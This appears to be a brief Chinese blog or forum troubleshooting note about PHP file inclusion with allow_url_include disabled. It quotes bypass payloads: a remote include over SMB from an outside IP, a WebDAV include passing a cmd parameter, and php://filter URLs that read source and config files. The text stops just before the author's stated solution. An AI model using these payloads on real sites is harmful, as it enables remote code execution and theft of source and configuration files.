问题描述如下:
allow_url_include = 0禁用了http://包装器
有一些绕过的方法,但是试了一下没什么用处。链接如下:
php文件包含漏洞(allow_url_include=Off)的绕过方法
第1种:smb协议
Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm
第2种:WebDAV
Payload:http://127.0.0.1/aaa.php?path=\\36.*8.**.74\webdav\code.htm&cmd=phpinfo();
第3种:php://filter/
利用php://filter/不能直接GetShell,但可以读取网站php代码文件,然后进行代码分析。或读取网站配置文件等其他重要文件。
Payload:
http://127.0.0.1/aaa.php?path=php://filter/read=convert.base64-encode/resource=D:/phpStudy/WWW/index.php
http://192.168.56.130/aaa.php?path=php://filter/read=convert.base64-encode/resource=/var/www/html/index.php
还有人说是要修改php.ini中的设置:
修改过后发现没有什么作用。重启服务也无效。
最后解决方法为在这里进行设置: